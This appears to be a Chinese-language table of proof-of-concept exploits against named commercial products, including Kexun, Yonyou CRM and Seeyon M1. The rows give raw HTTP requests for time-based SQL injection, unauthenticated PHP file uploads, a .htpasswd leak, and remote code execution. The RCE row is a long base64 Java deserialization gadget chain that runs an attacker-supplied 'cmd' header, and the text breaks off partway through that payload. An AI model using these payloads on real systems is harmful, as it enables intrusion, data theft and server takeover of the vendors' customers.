| 科迅-一卡通管理系统-SQL注入 | GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 资管云–任意文件上传 | POST /comfileup.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe Upgrade-Insecure-Requests: 1 Priority: u=1 Content-Type: multipart/form-data; boundary=——–1110146050 Content-Length: 117 ———-1110146050 test |
| 孚盟云-CRM系统-SQL注入 | 未知 |
| 迈普-多业务融合网关-信息泄露 | /.htpasswd/ |
| 通天星-主动安全监控云平台-RCE | 未知 |
| 微信公众平台-无限回调系统 -SQL注入 | POST /user/ajax.php?act=siteadd HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close siteUrl=’;select sleep(5)#’ |
| 用友-畅捷通CRM-任意文件上传 | POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 |
| 用友-CRM客户关系管理系统-任意文件上传 | POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Length: 277 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarye0z8QbHs79gL8vW5 Upgrade-Insecure-Requests: 1 ——WebKitFormBoundarye0z8QbHs79gL8vW5 <?php phpinfo();?> help.php |
| 致远互联-M1移动协同办公管理软件-RCE | POST /esn_mobile_pns/service/userTokenService HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Type: application/x-www-form-urlencoded cmd: whoami {{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxCeXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZGVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaamJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCRnFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhobFkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFLem9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFWkRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2